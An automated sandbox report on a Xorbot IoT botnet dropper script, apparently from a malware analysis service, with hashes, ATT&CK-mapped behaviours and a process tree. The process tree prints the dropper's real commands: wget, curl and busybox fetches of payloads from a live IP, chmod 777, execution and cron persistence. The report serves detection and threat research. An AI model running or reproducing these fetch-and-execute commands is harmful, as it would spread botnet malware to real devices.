xorbot | 3d0da0f02fc31c2ea115a328dc878c8b41ff796faab9348025f38520d6ddb315

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
03/12/2024, 08:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

cf70d58f95757ee8960c21dc3c7551eb
SHA1

0c40b1cd7245f052bf82533610cb2d05b9ed349f
SHA256

3d0da0f02fc31c2ea115a328dc878c8b41ff796faab9348025f38520d6ddb315
SHA512

5eacf2de8727fc9fc5e44885fcb310e06826869079d0e8fdf752cbe4eab4cb7403f261657a15c31279eb0e14411b4c03ba0054c45d6c54ea60c4cb538ddf7941
SSDEEP

192:0VdnWFAfPfLfluf6B2Ik8VF+UIk8VFFfPfLfluf6RL:0VdnWF0aDL

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (2053) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
700	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe	701	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe

Renames itself 1 IoCs

pid	Process
702	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.2WRzzT	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/278/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/466/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/855/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/971/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/972/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/29/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/43/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/836/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/965/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/795/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/803/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1031/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/713/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/742/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/744/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/787/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/935/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/991/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/26/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/407/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/731/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/791/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/821/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/930/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/964/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1002/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/343/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/663/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/747/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/776/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1012/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/788/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/859/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/907/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/877/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1010/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/872/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/992/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1026/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/11/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/307/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/785/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/840/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/916/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/918/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/989/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/42/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/621/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/741/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/915/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/980/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/665/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/764/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/771/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/850/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/780/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/818/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/822/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/946/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1001/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1008/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/1029/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
File opened for reading	/proc/796/cmdline	YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe	wget
File opened for modification	/tmp/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe	curl
File opened for modification	/tmp/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:666
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:669
- /usr/bin/wget
  wget http://216.126.231.240/bins/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
  2⤵
  - Writes file to tmp directory
  PID:673
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:690
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
  2⤵
  - Writes file to tmp directory
  PID:698
- /bin/chmod
  chmod 777 YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /tmp/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
  ./YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:701
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:703
  - - /usr/bin/crontab
      crontab -l
      4⤵
      Reads runtime system information
      PID:704
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:705
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:706
- /bin/rm
  rm YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe
  2⤵
  PID:708
- /usr/bin/wget
  wget http://216.126.231.240/bins/K2NY5ppDLnwyGaXQ3z3mQdU4ZOqs8AObis
  2⤵
  PID:711
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/K2NY5ppDLnwyGaXQ3z3mQdU4ZOqs8AObis
  2⤵
  PID:712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/YGgRIVmG76UVz4jU8WAzKKyollxFElZ7Qe

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/var/spool/cron/crontabs/tmp.2WRzzT

Filesize
210B

MD5
7fe6eebf15a3efe0aa3672d0e431cc83

SHA1
21858cdd58fbfd7ebb02c52ba4a6b421f2032669

SHA256
1647c4b76fa0e468d94a37eaeedba13262d00119d51fb87ef46476d64d7ee2da

SHA512
61b59d2ea62ae4e76707e961294afd4b21585c3b7c23936a68ff4bf5c81d9122dc19ec6733ea06792a28e7fb18fcae6993b34f19ed6836d7d89040c858bd05d8

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads